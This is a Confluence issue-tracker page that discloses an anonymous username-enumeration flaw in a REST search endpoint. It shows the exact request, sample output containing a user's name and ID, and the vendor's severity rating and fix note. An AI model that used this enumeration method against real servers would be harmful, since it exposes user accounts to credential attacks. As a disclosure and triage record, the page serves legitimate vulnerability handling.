Uploaded image for project: 'Confluence Data Center'
  1. Confluence Data Center
  2. CONFSERVER-25322

The vulnerability exists in the standalone and also in the online demonstration enviroment.

      It is possible to anonymously enumerate all usernames via the script at /rest/prototype/1/search/user.json?max-results=10&query=XX. The 'query' GET parameter should contain at least two charakters. It is possible to enumerate all usernames by performing a search from 'query' value 'aa' to 'zz'.


      When the following GET request is made:

      GET /rest/prototype/1/search/user.json?max-results=10&query=si HTTP/1.1
      Host: confluence.atlassian.com
      

      The following answer is given:

      HTTP/1.1 200 OK
      Date: Tue, 24 Apr 2012 13:32:11 GMT
      Cache-Control: no-cache, must-revalidate
      Expires: Thu, 01 Jan 1970 00:00:00 GMT
      Content-Type: application/json
      Keep-Alive: timeout=3, max=20
      Connection: Keep-Alive
      Content-Length: 11707
      
      {"totalSize":846,"result":[{"id":"254738536","type":"user","title":"Harshil Singhal","wikiLink":"[~hs39867]","createdDate":{"friendly":"Aug 22, 2011","date":"2011-08-22T21:52:45-0500"},"creator":{"links":[{"href":"https://confluence.atlassian.com/rest/prototype/1/user/system/anonymous","rel":"self"}],"avatarUrl":"/s/en_GB/3277/16/_/images/icons/profilepics/anonymous.png","anonymous":true,"displayName":"Anonymous"},"lastModifier":{"links":[{"href":"https://confluence.atlassian.com/rest/prototype/1/user/system/anonymous","rel":"self"}],"avatarUrl":"/s/en_GB/3277/16/_/images/icons/profilepics/anonymous.png","anonymous":true,"displayName":"Anonymous"},"username":"hs39867","thumbnailLink":
      [..]

            [CONFSERVER-25322] The vulnerability exists in the standalone and also in the online demonstration enviroment.

            fixing as part of CONF-25350

            Chii (Inactive) added a comment - fixing as part of CONF-25350

            Hi David,

            Thank you for taking this vulnerability seriously.

            Regards,

            Sijmen

            Sijmen Ruwhof added a comment - Hi David, Thank you for taking this vulnerability seriously. Regards, Sijmen

            David Black added a comment - - edited

            CVSS score: 4.3 => Medium severity
             
            Exploitability Metrics

            AccessVector Network
            AccessComplexity Medium
            Authentication None

             
            Impact Metrics

            ConfImpact Partial
            IntegImpact None
            AvailImpact None

            See https://extranet.atlassian.com/display/SECCOUNCIL/How+to+evaluate+vulnerability+severity+under+CVSS for details and http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2 for score calculator.

            David Black added a comment - - edited CVSS score: 4.3 => Medium severity   Exploitability Metrics AccessVector Network AccessComplexity Medium Authentication None   Impact Metrics ConfImpact Partial IntegImpact None AvailImpact None See https://extranet.atlassian.com/display/SECCOUNCIL/How+to+evaluate+vulnerability+severity+under+CVSS for details and http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2 for score calculator.

            David Black added a comment - - edited

            Hi, sruwhof on a fresh stand-alone confluence 4.2.1 out of the box I cannot anonymously enumerate usernames using the method you have reported here.
            Instead the api returns the following:
            <?xml version="1.0" encoding="UTF-8" standalone="yes"?><status><status-code>401</status-code><message>Client must be authenticated to access this resource.</message></status>

            After enabling 'Anonymous Access' (via the Global Permissions configuration page) it is possible to anonymously enumerate usernames using the method you have reported here. This occurs even with the 'USE' 'View User Profiles' global permission not being granted to anonymous users.

            David Black added a comment - - edited Hi, sruwhof on a fresh stand-alone confluence 4.2.1 out of the box I cannot anonymously enumerate usernames using the method you have reported here. Instead the api returns the following: <?xml version="1.0" encoding="UTF-8" standalone="yes"?><status><status-code>401</status-code><message>Client must be authenticated to access this resource.</message></status> After enabling 'Anonymous Access' (via the Global Permissions configuration page) it is possible to anonymously enumerate usernames using the method you have reported here. This occurs even with the 'USE' 'View User Profiles' global permission not being granted to anonymous users.

            Thank you for reporting this bug to Atlassian.

            David Black added a comment - Thank you for reporting this bug to Atlassian.

              jxie Chii (Inactive)
              6d8aa60d5817 Sijmen Ruwhof
              Affected customers:
              0 This affects my team
              Watchers:
              7 Start watching this issue

                Created:
                Updated:
                Resolved: